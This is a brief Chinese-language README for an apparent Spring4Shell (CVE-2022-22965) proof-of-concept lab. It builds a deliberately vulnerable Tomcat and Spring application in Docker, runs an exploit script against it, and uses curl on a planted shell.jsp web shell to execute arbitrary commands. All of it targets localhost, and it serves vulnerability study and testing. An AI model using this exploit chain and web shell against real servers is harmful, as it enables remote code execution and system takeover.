
针对 CVE-2022-22965 Spring4Shell 的 PoC 与漏洞利用
Spring4Shell(CVE-2022-22965)概念验证,包含一个存在漏洞的 Tomcat 服务器和一个存在漏洞的 spring4shell 应用程序。
docker build . -t spring4shell
docker run -p 80:8080 spring4shell
如有需要,也可以开放调试器端口运行:
docker run -p 80:8080 –p 5005:5005 spring4shell
有关在 IntelliJ IDEA 中设置远程调试器的详细信息,请参阅原始博客文章!
./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell
然后,你可以像这样远程执行任意命令:
curl http://localhost/spring4shell/shell.jsp?cmd=id --output -
...或通过访问上面的 URL。